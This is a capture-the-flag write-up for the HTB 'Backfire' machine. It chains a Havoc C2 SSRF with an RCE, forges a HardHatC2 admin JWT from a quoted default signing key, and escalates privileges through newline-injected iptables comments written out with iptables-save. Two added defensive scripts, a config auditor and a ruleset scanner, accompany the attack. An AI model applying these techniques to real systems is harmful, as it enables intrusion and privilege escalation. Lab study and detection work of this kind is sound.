HTB Backfire
user
recon
port_info
sudo nmap -sT -sC -sV -p22,443,5000,8000 backfire.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-07 09:32 +08
Nmap scan report for backfire.htb (10.129.190.30)
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_ 256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp open ssl/http nginx 1.22.1
| tls-alpn:
| http/1.1
| http/1.0
|_ http/0.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=CO/stateOrProvinceName=Florida/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Not valid before: 2024-04-14T00:15:11
|_Not valid after: 2027-04-14T00:15:11
|_http-title: 404 Not Found
|_http-server-header: nginx/1.22.1
5000/tcp closed upnp
8000/tcp open http nginx 1.22.1
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 1559 17-Dec-2024 11:31 disable_tls.patch
| 875 17-Dec-2024 11:34 havoc.yaotl
|_
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.41 seconds
The target's open ports are listed above. In havoc.yaotl I found two users and their corresponding passwords, and it is also clear that the target very likely runs a Havoc C2 service (port 443). Beyond that there is no further information.
exploit
I tried directory scanning on port 443, but found nothing useful. Searching for existing Havoc CVEs shows that the current latest Havoc release is affected by CVE-2024-41570, and there is also an RCE on GitHub: an unauthenticated SSRF and an auth_rce, respectively. How can we make use of these? Combining the known information, we have passwords for the Havoc application. Can we use the SSRF to send a login request to the Teamserver? The hard part is that we have to modify the PoC ourselves and chain the two vulnerabilities together, which is a bit tricky q_q (definitely not because I slacked off in network programming class). I found a one-click exploit script on GitHub that gets an initial shell.
ilya@backfire:~$ ls -al
total 40
drwx------ 5 ilya ilya 4096 Dec 12 10:14 .
drwxr-xr-x 4 root root 4096 Sep 28 20:05 ..
lrwxrwxrwx 1 root root 9 Dec 12 10:14 .bash_history -> /dev/null
-rw-r--r-- 1 ilya ilya 220 Sep 27 16:43 .bash_logout
-rw-r--r-- 1 ilya ilya 3526 Sep 27 16:43 .bashrc
drwxr-xr-x 2 root root 4096 Sep 30 07:39 files
-rw-r--r-- 1 root root 174 Sep 28 23:02 hardhat.txt
drwxr-xr-x 10 ilya ilya 4096 Sep 27 19:18 Havoc
-rw-r--r-- 1 ilya ilya 807 Sep 27 16:43 .profile
drwxr-xr-x 2 ilya ilya 4096 Dec 12 10:01 .ssh
-rw-r----- 1 root ilya 33 Feb 6 20:15 user.txt
ilya@backfire:~$ cat ./hardhat.txt
Sergej said he installed HardHatC2 for testing and not made any changes to the defaults
I hope he prefers Havoc bcoz I don't wanna learn another C2 framework, also Go > C#
ilya@backfire:~$ id
uid=1000(ilya) gid=1000(ilya) groups=1000(ilya),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
ilya@backfire:~$ netstat -antlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:7096 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:40056 0.0.0.0:* LISTEN -
tcp 0 664 10.129.190.30:22 10.10.14.73:45746 ESTABLISHED -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33334 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33348 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33326 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33324 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33362 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33316 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33378 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33300 TIME_WAIT -
tcp 0 0 10.129.190.30:22 10.10.14.73:33396 ESTABLISHED -
tcp 0 0 127.0.0.1:5000 127.0.0.1:33288 TIME_WAIT -
tcp 0 0 127.0.0.1:5000 127.0.0.1:50634 TIME_WAIT -
tcp6 0 0 :::22 :::* LISTEN -
I created an SSH key pair to log in.
In ilya's home directory I found hardhat.txt, which says that another user, Sergej, is running the HardHat service with default configuration, and it is listening on port 7096, so I forwarded port 7096 out. It is a login page. Since it runs with the default configuration, I tried default credentials, but learned that when HardHatC2 starts for the first time the TeamServer prints the HardHat_Admin account and password, which are random, so there are no default credentials. Time for another approach: search whether this HardHatC2 also has known vulnerabilities.
It turns out HardHatC2 has both an authentication bypass and an RCE. The authentication bypass exists because the JWT signing key is hardcoded in the configuration file, so a JWT can be forged to bypass authentication. The detailed write-up is here: HardhatC2
"AllowedHosts": "*",
"Jwt": {
"Key": "jtee43gt-6543-2iur-9422-83r5w27hgzaq",
"Issuer": "hardhatc2.com"
Use the PoC to forge a JWT and then use it to create an account with teamlead privileges: sth_pentest
python3 ./exp3.py
Generated JWT:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJIYXJkSGF0X0FkbWluIiwianRpIjoiMDAwNGY2ZGYtNjg3ZS00YWU0LThiYzYtNzAyYTMwODFkZTI4IiwiaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNS9pZGVudGl0eS9jbGFpbXMvbmFtZWlkZW50aWZpZXIiOiIxIiwiaXNzIjoiaGFyZGhhdGMyLmNvbSIsImF1ZCI6ImhhcmRoYXRjMi5jb20iLCJpYXQiOjE3Mzg5MDYyNzAsImV4cCI6MTc0MTMyNTQ3MCwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiQWRtaW5pc3RyYXRvciJ9.kNQmZE124q8n-NNmvViCzrcnn98FkHS-mUhzZsibpOs
User sth_pentest created
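The root cause above is a signing key shipped in the default configuration, so any copy of the source is enough to mint tokens the server trusts. The following is an added example (not code from this writeup or from the HardHatC2 project) of the check a defender would run against an appsettings.json before exposing a TeamServer: it flags the published default key quoted above, a key shorter than what RFC 7518 requires for HS256, and the wildcard AllowedHosts setting, and it produces a rotated configuration with a fresh random key. The JSON document is constructed here from the fragment in the writeup; the function names are assumptions.

```python
import json
import secrets

# Default signing key from the HardHatC2 appsettings.json quoted in this writeup.
KNOWN_DEFAULT_KEYS = {"jtee43gt-6543-2iur-9422-83r5w27hgzaq"}

# RFC 7518 section 3.2: an HMAC key must be at least as long as the hash output (256 bits for HS256).
MIN_HS256_KEY_BYTES = 32

# Constructed sample config built from the fragment shown above (the page shows only part of the file).
PAGE_CONFIG = json.dumps({
    "AllowedHosts": "*",
    "Jwt": {
        "Key": "jtee43gt-6543-2iur-9422-83r5w27hgzaq",
        "Issuer": "hardhatc2.com",
    },
})


def audit_config(raw_json):
    """Return a list of human-readable findings for a HardHatC2-style appsettings.json."""
    cfg = json.loads(raw_json)
    findings = []
    key = cfg.get("Jwt", {}).get("Key", "")

    if not key:
        findings.append("Jwt.Key is missing: token signing cannot be trusted")
    else:
        if key in KNOWN_DEFAULT_KEYS:
            # The key is public knowledge, so the signature proves nothing about who minted the token.
            findings.append("Jwt.Key is a published default: anyone with the source can forge valid tokens")
        if len(key.encode()) < MIN_HS256_KEY_BYTES:
            findings.append("Jwt.Key is shorter than 256 bits: below the RFC 7518 minimum for HS256")

    if cfg.get("AllowedHosts") == "*":
        # Informational: host filtering is disabled, which is common but worth knowing about.
        findings.append("AllowedHosts is '*': the Host header is not validated")

    return findings


def rotate_key(raw_json):
    """Return a copy of the config (as a dict) with a fresh 384-bit random signing key."""
    cfg = json.loads(raw_json)
    cfg.setdefault("Jwt", {})["Key"] = secrets.token_urlsafe(48)
    return cfg


if __name__ == "__main__":
    for finding in audit_config(PAGE_CONFIG):
        print("FINDING:", finding)
    print(json.dumps(rotate_key(PAGE_CONFIG), indent=2))
```

Rotating the key invalidates every token issued under the old one, which is the desired effect: any session minted with the leaked default stops working the moment the new key is loaded.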
A reverse shell can be obtained from this path: https://127.0.0.1:7096/ImplantInteract
sudo -l shows:
sergej@backfire:~$ sudo -l
Matching Defaults entries for sergej on backfire:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User sergej may run the following commands on backfire:
(root) NOPASSWD: /usr/sbin/iptables
(root) NOPASSWD: /usr/sbin/iptables-save
Privilege escalation follows the sudo iptables LPE technique. It mainly abuses the iptables option -m comment --comment "rule", which attaches a comment to a rule. In that comment we can use bash's $'\nxxxx\n' quoting so that \n is interpreted as a newline, which gives us control over the output. Then iptables-save is used to force-write to an arbitrary file; this can be authorized_keys, sudoers, /etc/passwd, and so on.
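Because the whole trick depends on a rule comment carrying line breaks, the abuse is easy to spot in the iptables-save output itself. The following is an added example (not code from this writeup or from any tool it mentions) of a scanner a defender can run over the saved ruleset: it extracts every --comment string, including ones that span lines, and flags line breaks, suspicious content such as sudoers or authorized_keys syntax, and unusually long comments. The sample ruleset is constructed for this example and the injected line is a placeholder; the function names are assumptions.

```python
import re
from dataclasses import dataclass, field

# A --comment value as iptables-save prints it: double-quoted, with \" and \\ escaped.
# DOTALL lets the match continue across the line breaks that an injected comment introduces.
COMMENT_RE = re.compile(r'--comment\s+"((?:[^"\\]|\\.)*)"', re.DOTALL)

# Fragments that have no business in a firewall comment but do appear in the files
# the writeup names as write targets (sudoers, authorized_keys, /etc/passwd).
SUSPICIOUS_MARKERS = ("ALL=(ALL", "NOPASSWD", "ssh-rsa", "ssh-ed25519", ":0:0:", "/bin/sh", "/bin/bash")

# iptables caps comments at 256 bytes; legitimate ones are rarely anywhere near that.
LONG_COMMENT = 200

# Constructed sample of iptables-save output; the second rule carries an injected comment.
SAMPLE_RULESET = """# Generated by iptables-save (constructed sample)
*filter
:INPUT ACCEPT [0:0]
-A INPUT -i lo -m comment --comment "allow loopback" -j ACCEPT
-A INPUT -p tcp --dport 22 -m comment --comment "
PLACEHOLDER_USER ALL=(ALL) NOPASSWD: PLACEHOLDER_COMMAND
" -j ACCEPT
COMMIT
"""


@dataclass
class Finding:
    line: int                      # line of the saved ruleset where the rule starts
    comment: str
    reasons: list = field(default_factory=list)


def scan_iptables_save(text):
    """Return a Finding for every rule comment that looks like file-write abuse."""
    findings = []
    for match in COMMENT_RE.finditer(text):
        comment = match.group(1)
        reasons = []
        if "\n" in comment or "\r" in comment:
            reasons.append("comment contains a line break")
        for marker in SUSPICIOUS_MARKERS:
            if marker in comment:
                reasons.append(f"comment contains {marker!r}")
        if len(comment) > LONG_COMMENT:
            reasons.append("comment unusually long")
        if reasons:
            line_no = text.count("\n", 0, match.start()) + 1
            findings.append(Finding(line_no, comment, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_iptables_save(SAMPLE_RULESET):
        print(f"line {f.line}: {', '.join(f.reasons)}")
        print("  comment:", repr(f.comment))
```

The matching mitigation on the sudo side is to stop granting iptables-save without a fixed argument list, so the output location cannot be chosen by the caller; the scanner above is the detective control for rulesets that already exist.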
Summary
This machine offers a very interesting exploitation scenario: attacking vulnerabilities in existing open-source C2 frameworks, which is something you rarely see. It broadened my horizons, and it also explained something from a practical write-up I once read, where a fellow researcher described his C2, running with default configuration, being traced back and countered (I think it was Havoc). As for why this write-up has no screenshots: I felt there was nothing worth capturing, very little was worth pasting, so I simply left them out (adding blog work for a handful of images is not worth it [dog], I am just lazy~).